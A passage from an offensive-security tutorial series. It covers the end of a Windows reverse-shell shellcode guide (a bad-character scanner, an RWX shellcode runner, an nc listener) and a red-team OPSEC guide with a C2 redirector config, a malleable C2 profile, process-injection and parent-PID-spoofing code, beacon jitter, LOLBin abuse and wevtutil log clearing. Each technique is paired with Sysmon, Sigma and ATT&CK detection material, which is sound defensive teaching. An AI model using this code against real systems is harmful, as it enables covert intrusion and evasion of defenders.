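        ("wShowWindow", U16), ("cbReserved2", U16),
        ("lpReserved2", U32),
        ("hStdInput", U32), ("hStdOutput", U32), ("hStdError", U32),
    ]


def layout():
    """Map each field name to its byte offset."""
    return {name: getattr(StartupInfoA32, name).offset
            for name, _ in StartupInfoA32._fields_}


if __name__ == "__main__":
    print(ctypes.sizeof(StartupInfoA32))
    for name, offset in layout().items():
        print(f"0x{offset:02x}  {name}")
```

Read from the top of the structure, eleven dwords precede dwFlags (cb plus ten zeroed fields), and two dwords sit between dwFlags and hStdInput, for seventeen dwords in total.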

8. Null-Byte Elimination and Bad-Character Audit

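A single \x00 mid-payload truncates the shellcode whenever it is delivered through a C-string operation such as strcpy, and other vectors add their own bad bytes (CR/LF in line-based protocols, for example). Design them out from the start.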

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and CreateProcessA’s command-line parser tolerates the leading space that pads " cmd" to four bytes. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RWX → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP from `cmd.exe` or a non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	Handle opens with injection-capable `GrantedAccess` masks; `CallTrace` containing `UNKNOWN` (caller in unbacked memory)
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

A common community Sigma pattern for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high
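
To make the rule's logic concrete, the sketch below applies the same two conditions to Sysmon Event ID 10 records represented as plain dictionaries. The event shape and the matches_rule name are assumptions for illustration; a real pipeline would run the Sigma rule through its SIEM backend instead.

```python
SUSPICIOUS_ACCESS = {0x147A, 0x1F3FFF}  # the masks listed in the rule


def matches_rule(event: dict) -> bool:
    """True when GrantedAccess is a listed mask and CallTrace mentions UNKNOWN."""
    try:
        access = int(str(event.get("GrantedAccess", "")), 16)
    except ValueError:
        return False  # missing or malformed mask
    trace = str(event.get("CallTrace", ""))
    # Sigma's `contains` modifier is case-insensitive, so compare in lower case.
    return access in SUSPICIOUS_ACCESS and "unknown" in trace.lower()


if __name__ == "__main__":
    sample = {
        "GrantedAccess": "0x147a",
        "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4e4|UNKNOWN(00000000001A0000)",
    }
    print(matches_rule(sample))
```

Both conditions must hold: the mask alone also appears in legitimate tooling, and it is the unbacked caller in CallTrace that points at code running outside any loaded module.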

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office applications from creating child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block JavaScript or VBScript from launching downloaded executable content), and alert on RWX allocations. AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls — Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 8 on remote-thread delivery; EID 7 only when the DLL is loaded from disk
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
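Detection follows the chain rather than a single indicator: process creation, outbound TCP, and ProcessAccess telemetry each expose a different stage.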

OPSEC Principles for Red Teamers: Staying Undetected

Objective: Understand the operational security discipline an authorized red teamer must apply across infrastructure, process execution, network traffic, and on-disk artifacts to minimize detection surface, and learn the corresponding telemetry defenders use to catch each OPSEC failure.

1. What OPSEC Means for Red Teamers

Operational security is the discipline that separates a noisy penetration test from a realistic adversary simulation. A red team engagement that triggers every EDR sensor on the first beacon delivers a process audit, not a threat-emulation result. Every action — every API call, every DNS query, every dropped file — generates a detection signature. Strong OPSEC means knowing precisely what artifacts each action produces and either avoiding the action, blending it into noise, or accepting the risk consciously.

This tutorial is written for authorized red teamers and the blue teams who hunt them. Every offensive technique is paired with the exact telemetry that exposes it, so operators can self-audit and defenders can close the loop.

2. The Five-Step OPSEC Cycle Applied to Red Teaming

The classic OPSEC process, adapted to an offensive engagement:

Step	Action	Red Team Application
1	Identify critical information	Tooling names, operator IPs, attacker hostnames, C2 domains, callback patterns
2	Analyze threats	EDR vendor, NDR, SIEM rule set, threat-hunt team maturity
3	Analyze vulnerabilities	Which artifacts each TTP leaves (Sysmon ID, ETW provider, file path)
4	Assess risk	Likelihood × impact of each artifact being correlated
5	Apply countermeasures	Malleable profiles, LOLBins, in-memory execution, in-scope log suppression

Operators run this loop before each phase — initial access, lateral movement, persistence, exfiltration — not once at the start of the engagement.

Flowchart of the five-step OPSEC cycle: Identify Critical Info, Analyze Threats, Identify Vulnerabilities, Assess Risk, Apply Countermeasures, looping back for each engagement phase — The OPSEC cycle is executed before every engagement phase — initial access, lateral movement, persistence, and exfiltration — not just once at kickoff.

3. Thinking Like a Sensor: The Defender’s Telemetry Stack

You cannot evade what you do not understand. Modern defenders correlate signals from at least five overlapping layers:

Sensor Layer	What it sees
Sysmon	Process create, network connect, image load, thread injection, pipe create, DNS query
ETW	Kernel-level process/thread events, `Microsoft-Windows-Threat-Intelligence`, PowerShell script block logging
AMSI	In-process scan of script content before execution
EDR	Userland API hooks, kernel callbacks, behavioral chains
NDR / SIEM	Beacon periodicity, JA3/JA4 fingerprints, DNS anomalies, log correlation

The Microsoft-Windows-Threat-Intelligence provider deserves a callout: only PPL-protected, ELAM-signed consumers can subscribe to it, and it is the primary ETW source EDRs use for injection telemetry. Any attempt to disable it is itself a high-fidelity alert (T1562.001).

4. Infrastructure OPSEC: Redirectors, Domains, and Segmentation

If your C2 team server is exposed directly to the target network, a single block at the perimeter ends the engagement. Infrastructure OPSEC is about layering the chain so that the loud parts are disposable.

Component	OPSEC Detail
Redirectors	Apache `mod_rewrite` or Nginx reverse proxies between implant and team server; filter on URI, User-Agent, and source ASN
Categorized / aged domains	Domains > 90 days old, plausible web presence, Whois privacy, matching TLS certificates from a real CA
TLS hygiene	Avoid default self-signed Cobalt Strike certs; serve a valid LetsEncrypt or commercial cert matching the fronted domain
Provider segmentation	Spread redirectors, payload hosts, and team servers across multiple providers and regions; a defender who blocks one ASN should not break the entire kill chain
Domain fronting / CDN abuse	TLS SNI presents a fronted CDN host while the `Host:` header routes to the operator’s origin (`T1090.004`)

A minimal Nginx redirector enforcing path-based filtering:

server {
    listen 443 ssl;
    server_name updates.example-cdn.com;

    ssl_certificate     /etc/letsencrypt/live/.../fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/.../privkey.pem;

    # Drop anything that isn't on the expected beacon URI
    if ($uri !~* "^/(api/v2/telemetry|cdn/assets)") {
        return 404;
    }

    # Drop scanners and unexpected User-Agents
    if ($http_user_agent !~* "Mozilla/5\.0.*Chrome") {
        return 404;
    }

    location / {
        proxy_pass https://teamserver.internal:8443;
        proxy_set_header Host $host;
    }
}

Architecture diagram showing C2 infrastructure layering from target network through an Nginx redirector and CDN proxy to a protected team server and operator console — Disposable redirector layers isolate the team server — blocking the front-facing node ends the beacon path, not the engagement.

5. Malleable C2 Profiles and Traffic Shaping

Default C2 profiles are signatured. A malleable profile rewrites every byte the beacon puts on the wire so traffic blends with expected enterprise patterns.

http-get {
    set uri "/api/v2/telemetry";
    client {
        header "Host" "updates.example-cdn.com";
        header "Accept" "application/json";
        metadata {
            base64url;
            prepend "session=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            base64;
            prepend "{\"status\":\"ok\",\"data\":\"";
            append "\"}";
            print;
        }
    }
}

http-post {
    set uri "/api/v2/upload";
    client {
        header "Content-Type" "application/octet-stream";
        id { base64url; parameter "tid"; }
        output { base64; print; }
    }
}

Key directives: the metadata transform hides session state in a cookie; Host: masquerades as a CDN; URIs match a believable application path. The corresponding http-stager, process-inject, and post-ex blocks must also be customized, because default stager URIs are among the best-known Cobalt Strike fingerprints.

6. Process & Memory OPSEC

The classic injection triad is also the most signatured behavior in Windows. The following is shown as a “what not to do naively” reference — every line annotates the telemetry it produces:

// VirtualAllocEx in remote PID -> needs a handle with PROCESS_VM_OPERATION; the handle open is what Sysmon EID 10 records
LPVOID rbuf = VirtualAllocEx(hProc, NULL, sz,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);  // RWX = EDR red flag

// WriteProcessMemory                 -> needs PROCESS_VM_WRITE on the same handle (visible in EID 10 GrantedAccess)
WriteProcessMemory(hProc, rbuf, sc, sz, NULL);

// CreateRemoteThread                 -> Sysmon EID 8 (CreateRemoteThread)
HANDLE hThr = CreateRemoteThread(hProc, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)rbuf,
                                 NULL, 0, NULL);

Quieter alternatives reduce — but do not eliminate — visibility:

Section-based injection via NtMapViewOfSection (a T1055 variant with no dedicated sub-technique) avoids WriteProcessMemory but is still observable via Threat-Intelligence ETW.
APC injection via NtQueueApcThread (T1055.004) triggers only when the target thread enters an alertable wait.
Reflective DLL / PE loading (T1620) avoids LoadLibrary and Sysmon Event ID 7 module-load entries for the malicious DLL path.
Direct / indirect syscalls (the SysWhispers3 pattern) bypass userland EDR hooks by invoking system services by number through the syscall instruction instead of the hooked ntdll exports.
Allocate RW, then VirtualProtect to RX — never request PAGE_EXECUTE_READWRITE directly.

Process selection matters as much as the technique. notepad.exe initiating an outbound connection is anomalous; a browser or svchost.exe doing so is not.

Hierarchy diagram comparing process injection techniques from the high-visibility classic VirtualAllocEx triad down to quieter alternatives including direct syscalls and reflective DLL loading, annotated with their telemetry exposure — Injection technique selection directly controls which EDR and ETW sensors fire — quieter methods reduce surface but none are invisible to kernel-level telemetry.

7. Parent PID Spoofing

Parent-child chains are one of the cheapest behavioral detections. Spoofing the parent via UpdateProcThreadAttribute breaks the chain so a payload launched from a phishing macro can claim explorer.exe as its parent (T1134.004).

STARTUPINFOEXA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
SIZE_T attrSize = 0;

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);

HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, explorerPid);
UpdateProcThreadAttribute(si.lpAttributeList, 0,
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
    &hParent, sizeof(HANDLE), NULL, NULL);

CreateProcessA(NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE,
               EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
               &si.StartupInfo, &pi);

The spoofed parent appears in Sysmon Event ID 1’s ParentProcessId and ParentImage fields. Detection: correlate ParentImage with the CreatingProcessId recorded by EDR kernel callbacks — they will disagree on a spoofed launch.
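
The correlation described above can be sketched as a join between two event sources. The record shapes below are assumptions: one list stands for Sysmon Event ID 1 records, the other for whatever source reports the true creator (an EDR kernel callback feed, for instance), and the field names are hypothetical.

```python
def find_ppid_mismatches(sysmon_events, creator_events):
    """Return (pid, claimed_parent, actual_creator) for every disagreement."""
    actual = {e["ProcessId"]: e["CreatingProcessId"] for e in creator_events}
    hits = []
    for event in sysmon_events:
        creator = actual.get(event["ProcessId"])
        if creator is not None and creator != event["ParentProcessId"]:
            hits.append((event["ProcessId"], event["ParentProcessId"], creator))
    return hits


if __name__ == "__main__":
    sysmon = [
        {"ProcessId": 4321, "ParentProcessId": 1000},  # claims PID 1000 as parent
        {"ProcessId": 5000, "ParentProcessId": 1000},
    ]
    creators = [
        {"ProcessId": 4321, "CreatingProcessId": 2222},  # really created by PID 2222
        {"ProcessId": 5000, "CreatingProcessId": 1000},
    ]
    print(find_ppid_mismatches(sysmon, creators))
```

A production version would key on process GUID or on PID plus creation time, since PIDs are reused, and would allow-list legitimate brokers such as UAC elevation, where the creator and the reported parent differ by design.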

8. Network OPSEC: Sleep, Jitter, and Protocol Blending

A beacon calling back every 60 seconds on the dot is trivially clustered by an NDR. Add jitter:

import random, time

def beacon_sleep(base_seconds: int, jitter_pct: int) -> None:
    delta = base_seconds * (jitter_pct / 100.0)
    interval = base_seconds + random.uniform(-delta, +delta)
    # 60s base, 30% jitter -> 42s..78s
    time.sleep(interval)

A 60s ± 30% schedule destroys naive periodicity heuristics; longer sleeps (3600s ± 50%) defeat most short-window NDR baselines but cost interactivity. Match channel to environment:

Channel	When to use
HTTPS	Default; blends with web traffic if profile is well-tuned (`T1071.001`)
DNS (TXT/A)	Egress-restricted networks; low bandwidth, noisy on Sysmon EID 22 (`T1071.004`)
SMB named pipe	Lateral peer-to-peer beaconing; avoid default `msagent_*` pipe names
Domain-fronted HTTPS	Where CDN egress is allowed and DPI cannot inspect SNI (`T1090.004`)
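
On the defender side, jittered beacons remain measurable because the spread of their inter-arrival times stays bounded. The sketch below computes the coefficient of variation (standard deviation divided by mean) of the gaps between connections to one destination. The 0.4 threshold is an illustrative assumption and would need tuning against real traffic.

```python
import statistics


def interarrival_cv(timestamps):
    """Coefficient of variation of the gaps between sorted timestamps (seconds)."""
    ordered = sorted(timestamps)
    gaps = [b - a for a, b in zip(ordered, ordered[1:])]
    if len(gaps) < 2:
        return None  # not enough connections to judge
    mean = statistics.mean(gaps)
    if mean == 0:
        return None
    return statistics.pstdev(gaps) / mean


def looks_periodic(timestamps, threshold=0.4):
    """Assumed heuristic: a low CV suggests machine-driven callbacks."""
    cv = interarrival_cv(timestamps)
    return cv is not None and cv < threshold


if __name__ == "__main__":
    print(interarrival_cv([0, 60, 120, 180]))       # fixed 60 s interval
    print(interarrival_cv([0, 42, 120, 162, 240]))  # gaps alternate 42 s / 78 s
```

For jitter drawn uniformly from ±p of the base interval, the expected CV is p/√3, so a 30% jitter still yields a CV of roughly 0.17, far lower than typical interactive browsing.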

9. LOLBins and In-Memory Execution

Living-off-the-Land Binaries (LOLBins) are signed Microsoft binaries that proxy execution and inherit trust. The trade-off is that they are now heavily monitored — rundll32.exe spawned by winword.exe is a textbook ASR trigger.

Binary	Common Abuse
`rundll32.exe`	Execute exported function from a DLL (`T1218.011`)
`regsvr32.exe`	Squiblydoo: scriptlet execution (`T1218.010`)
`mshta.exe`	HTA / inline VBScript execution (`T1218.005`)
`wmic.exe`	Process invocation; deprecated but still present
`certutil.exe -decode`	Decode staged base64 payloads (`T1140`)

In-memory execution avoids disk artifacts entirely:

BOFs (Beacon Object Files) execute small COFF objects inside the implant process — no new process, no file on disk.
Assembly.Load() loads a .NET assembly from a byte array, bypassing Image Load events for the managed module on disk.
Reflective DLL loading maps a DLL without invoking the loader, so it never appears in LoadLibrary audit paths.

A note on PowerShell: powershell -enc <base64> looks obfuscated, but Sysmon Event ID 1 records the full command line including the Base64 blob, and Script Block Logging (Event ID 4104) records the decoded script once it is enabled. AMSI sees the deobfuscated content immediately before execution. Encoding is not evasion against a modern stack.
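
The encoding is trivial to reverse during triage: the argument to -enc is Base64 over the UTF-16LE bytes of the script. A minimal decoding sketch follows; the function names are hypothetical, and the encoder exists only to produce test input.

```python
import base64


def decode_encoded_command(blob: str) -> str:
    """Decode the argument of `powershell -enc` (Base64 over UTF-16LE)."""
    return base64.b64decode(blob).decode("utf-16-le")


def encode_for_test(script: str) -> str:
    """Inverse helper, used here only to build sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    blob = encode_for_test("Get-Date")
    print(blob)
    print(decode_encoded_command(blob))
```

Applied to the CommandLine field of a process-creation event, this recovers the script text even where Script Block Logging was not enabled on the host.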

10. Artifact & Log OPSEC

Cleaning up is part of the engagement — but cleanup itself is loud.

Action	ATT&CK	OPSEC Caveat
Timestomping	`T1070.006`	`NtSetInformationFile` with `FileBasicInformation` rewrites `$STANDARD_INFORMATION`; `$FILE_NAME` MFT attribute is not updated and remains forensically accurate
Event log clearing	`T1070.001`	`wevtutil cl Security` generates Event ID 1102 (Security) / 104 (System) — the act of clearing is itself the alert
Disabling ETW	`T1562.006`	Patching `EtwEventWrite` in-process is in-memory only and produces no event of its own, but the memory-protection change it requires can surface through the Threat-Intelligence provider on EDRs that consume it
File deletion	`T1070.004`	NTFS `$MFT` entries persist; Volume Shadow Copies retain prior versions; USN journal records the unlink

Rule of thumb: do not clear logs unless the engagement scope explicitly authorizes it. Selective in-process ETW suppression is quieter, scope-limited, and reversible.
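
The timestomping caveat in the table translates into a simple forensic check once both attribute sets have been extracted from the MFT. The sketch below assumes the creation times are already parsed into datetime objects (by an MFT parser, for example). The two heuristics and the one-second tolerance are illustrative assumptions, and both produce false positives on copied or extracted files.

```python
from datetime import datetime, timedelta


def timestomp_indicators(si_created: datetime, fn_created: datetime,
                         tolerance: timedelta = timedelta(seconds=1)):
    """Return reasons why a file's $STANDARD_INFORMATION creation time looks altered."""
    reasons = []
    if si_created + tolerance < fn_created:
        reasons.append("SI creation predates FN creation")
    if si_created.microsecond == 0:
        reasons.append("SI creation has zero sub-second precision")
    return reasons


if __name__ == "__main__":
    si = datetime(2015, 1, 1, 0, 0, 0)
    fn = datetime(2024, 5, 1, 12, 30, 15, 123456)
    for reason in timestomp_indicators(si, fn):
        print(reason)
```

Neither signal is conclusive alone; analysts usually corroborate with USN journal entries recorded around the $FILE_NAME time.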

11. The OPSEC Operator Checklist

Phase	Check
Pre-op	Hostnames renamed off `kali`; tool hashes scrubbed; C2 profile validated against default-detection rules
Pre-op	Domains aged > 90 days, valid TLS certs, redirector ACLs in place, infra segmented across providers
Pre-op	Beacon sleep + jitter set; default pipe names changed; default `spawnto_x64` rewritten
During	Prefer in-memory execution (BOF, reflective, `Assembly.Load`); avoid disk staging
During	Spoof PPIDs where parent-child chains would otherwise flag; pick injection targets that already make network calls
During	Never run Mimikatz from disk; use in-memory credential access only with explicit authorization
During	Modify existing services rather than creating new ones (avoids Event ID 7045)
Post-op	Remove staging artifacts; never clear Security/System logs unless scope explicitly authorizes it
Post-op	Document every artifact for the client report — defenders need the IOC list for purple-team validation

12. Common Attacker Techniques

Technique	Description
Classic remote thread injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` — most signatured behavior on Windows
APC injection	`NtQueueApcThread` into alertable threads (`T1055.004`)
Process hollowing	`CreateProcess` suspended → unmap → write → `ResumeThread` (`T1055.012`)
Parent PID spoofing	`PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` to break parent-child chain (`T1134.004`)
Direct / indirect syscalls	Bypass userland API hooks via `syscall` instruction
Reflective DLL loading	Map DLL without `LoadLibrary` (`T1620`)
ETW / AMSI patching	In-process patch of `EtwEventWrite` (`T1562.006`) / `AmsiScanBuffer` (`T1562.001`)
LOLBin proxied execution	`rundll32`, `regsvr32`, `mshta` (`T1218`)
Domain fronting	CDN-fronted TLS to mask C2 destination (`T1090.004`)
Timestomping	Rewrite `$STANDARD_INFORMATION` MACE timestamps (`T1070.006`)

13. Defensive Strategies & Detection

The OPSEC failures above map directly to telemetry. Defenders should focus on behavior chains, not isolated IOCs — fixating on hashes catches yesterday’s adversary.

Sysmon Event ID	Captures	OPSEC Failure It Catches
`1`	Process Create + CommandLine + ParentImage	LOLBin abuse, PPID-spoof inconsistencies, encoded PowerShell
`3`	Network Connection	Beacon callbacks; non-network processes (`notepad.exe`) initiating connections
`7`	Image Loaded	Unusual DLL load paths; signed-binary side-loading (`T1574`)
`8`	CreateRemoteThread	Classic injection triad (`T1055`)
`10`	ProcessAccess	`GrantedAccess` masks like `0x1010` against `lsass.exe` (`T1003.001`)
`11`	FileCreate	Staging artifacts in `%TEMP%`, `%PUBLIC%`, `\ProgramData\`
`17` / `18`	Pipe Created / Connected	Default Beacon pipe names (`msagent_*`, `status_*`, `postex_*`)
`22`	DNS Query	DNS C2 (`T1071.004`) — high-frequency TXT/A to uncommon domains
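
The GrantedAccess values in Event ID 10 are bitwise ORs of process access rights, so decoding them shows what a handle was opened for. The sketch below covers the process-specific rights from the Windows SDK headers. The decode_access name is hypothetical, and standard rights such as SYNCHRONIZE are left out for brevity.

```python
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def decode_access(mask: int):
    """List the process-specific rights present in a GrantedAccess mask."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


if __name__ == "__main__":
    for mask in (0x1010, 0x147A):
        print(hex(mask), decode_access(mask))
```

Decoded this way, 0x1010 is a read-only combination typical of credential dumping, while 0x147a adds the write, operation, and thread-creation rights that remote injection needs.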

A Sigma sketch for the most common parent-spoof + LOLBin pattern:

title: rundll32 with Suspicious Arguments under explorer.exe or svchost.exe Parent
logsource:
  product: windows
  service: sysmon
detection:
  selection_proc:
    EventID: 1
    Image|endswith: '\rundll32.exe'
    ParentImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
  selection_cmd:
    CommandLine|contains:
      - ',DllRegisterServer'
      - 'javascript:'
      - 'shell32.dll,Control_RunDLL'
  filter_signed_paths:
    CurrentDirectory|startswith: 'C:\Windows\System32\'
  condition: selection_proc and selection_cmd and not filter_signed_paths
level: high

Windows events to collect: 4688 (process creation with command line), 4698 (scheduled task created), 4697 / 7045 (service installed, in the Security and System logs respectively), 1102 (Security log cleared), 4656/4663 (object access via SACL). Enable PowerShell Script Block Logging and Module Logging via GPO. Set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1 to protect LSASS, deploy Credential Guard, and enforce ASR rules blocking Office child-process spawning and LSASS credential theft. A misconfigured Sysmon ruleset is a common reason behavior-based detection fails, so deploy a tuned config (e.g., SwiftOnSecurity or olafhartong’s modular config) and review it quarterly.

Graph diagram mapping defender telemetry sources — Sysmon, ETW, AMSI, and Sigma rules — to the attacker OPSEC failures they detect, including process injection, LOLBin execution, PowerShell obfuscation, and PPID spoofing — Defenders correlate overlapping telemetry layers into behavior chains — no single sensor catches everything, but their intersection eliminates most OPSEC blind spots.

14. Tools for Red Team OPSEC Analysis

Tool	Description	Link
Sysmon	Microsoft endpoint telemetry agent — the primary source for behavioral detection	sysinternals.com
SwiftOnSecurity / olafhartong configs	Community Sysmon configurations tuned for detection coverage	github.com
Process Hacker	Inspect injected memory regions, RWX allocations, suspicious threads	processhacker.sourceforge.io
Process Monitor	File, registry, and process activity tracing during purple-team replay	sysinternals.com
Sigma	Generic SIEM detection rule format used in this post	sigmahq.io
Velociraptor	DFIR + hunt agent; runs VQL queries across the estate	velociraptor.app
Volatility 3	Memory forensics — detects reflective loads, injected sections, hollowed processes	volatilityfoundation.org
SilkETW / SealighterTI	Surface `Microsoft-Windows-Threat-Intelligence` and other ETW providers	github.com
Wireshark / Zeek	Network analysis for beacon periodicity, JA3/JA4 fingerprints, DNS C2	zeek.org

15. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection	`T1055`	Sysmon EID 8/10; Threat-Intelligence ETW
DLL Injection	`T1055.001`	Sysmon EID 8 with `TargetImage`
APC Injection	`T1055.004`	Threat-Intelligence ETW; EDR kernel callbacks
Process Hollowing	`T1055.012`	Image base mismatch; memory forensics (Volatility)
Parent PID Spoofing	`T1134.004`	Sysmon EID 1 `ParentImage` vs EDR `CreatingProcessId` mismatch
Obfuscated Files / Info	`T1027`	PowerShell Script Block Logging; AMSI
Clear Windows Event Logs	`T1070.001`	Event ID 1102 / 104
Timestomp	`T1070.006`	`$FILE_NAME` vs `$STANDARD_INFORMATION` divergence in MFT
Web Protocols C2	`T1071.001`	NDR JA3/JA4 + URI anomalies
DNS C2	`T1071.004`	Sysmon EID 22; DNS-Client ETW
Proxy / Redirector	`T1090`	Outbound destination ASN baseline drift
Domain Fronting	`T1090.004`	SNI vs `Host:` header divergence (where TLS inspection exists)
System Binary Proxy Execution	`T1218`	Sysmon EID 1 LOLBin command-line patterns
Disable or Modify Tools	`T1562.001`	Threat-Intelligence ETW; EDR self-protection alerts
Disable Event Logging	`T1562.002`	Audit policy change events; ETW provider state
Reflective Code Loading	`T1620`	Memory forensics; RWX private region scans

16. Summary

OPSEC is the discipline of knowing exactly what telemetry every offensive action produces, and making conscious risk decisions about each one.
The five-step OPSEC cycle (identify critical information, analyze threats, analyze vulnerabilities, assess risk, apply countermeasures) is run before each engagement phase, not once at kickoff.
Infrastructure OPSEC layers redirectors, aged categorized domains, segmented providers, and customized malleable C2 profiles — defaults are signatured.
Process and network OPSEC favor in-memory execution (BOF, reflective load, Assembly.Load), PPID spoofing, sensible injection-target selection, and sleep + jitter to destroy beacon periodicity.
Log and artifact suppression is a sharp tool: timestomping leaves $FILE_NAME evidence, clearing the Security log with wevtutil cl raises Event ID 1102 (other logs raise Event ID 104 in the System log), and ETW patching is itself observed by the Threat-Intelligence provider.
Defenders close every loop with Sysmon, ETW, AMSI, and behavior-chain Sigma rules — focus on TTP chains, not IOCs, to catch operators who actually practice OPSEC.

APCs: Asynchronous Procedure Calls and Thread Hijacking Surface

